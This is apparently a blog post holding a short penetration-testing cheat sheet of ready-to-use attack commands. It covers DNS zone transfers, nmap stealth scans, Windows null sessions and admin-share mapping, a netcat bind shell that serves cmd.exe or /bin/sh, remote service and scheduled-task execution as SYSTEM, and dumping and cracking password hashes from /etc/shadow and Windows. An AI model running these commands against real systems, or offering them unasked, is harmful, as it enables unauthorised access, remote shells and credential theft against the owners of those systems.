#Reconnaissance #
####################
---------------------
- DNS Zone Transfer -
---------------------
Windows: nslookup
server [DNS SERVER]
ls -d [domain.net]
UNIX: dig @[DNS SERVER] [domain.net] -t AXFR
####################
# Scanning #
####################
--------
- NMAP -
--------
# nmap -sS -sV -O -PI [IP Address/Range]
-sS (SYN Stealth Scan)
-sV (Version Probe)
-O (OS Detection)
-PI (Ping target - ICMP Echo to check if server alive)
-----------------
- Windows - Net -
-----------------
> net use \\hostname "" /U:""
> net use
> net sessions
> net view \\hostname
> net use * /del
> net time \\hostname
> net use * \\hostname\c$ [password] /u:[domain\userid]
####################
# Exploting #
####################
----------
- NetCat -
----------
> nc -l -p [PORT NO]
> nc [HOST IP] [PORT NO]
> nc -l -p [PORT NO] -e cmd.exe | /bin/sh
> nc -l -p [SOURCE PORT NO] 0
----------------------
- Windows SC command -
----------------------
> net start -> show all the service
> sc \\hostname start schedule
> sc \\hostname start
> at \\hostname [time in A/P format] [run command]
> (VISTA ONLY!) schtasks /create /s [target IP] /ru "system" /sc once /st 20:45:00 /sd mm/dd/yyyy /tn [program name] /tr [full path with program name]
-----------------------
- Password Crack UNIX -
-----------------------
# unshadow /etc/passwd /etc/shadow > /tmp/combined
# john /tmp/combined
--------------------------
- Password Crack WINDOWS -
--------------------------
# use pwdump3 or fgdump
# crack with John the Ripper or Cain & Abel
No comments:
Post a Comment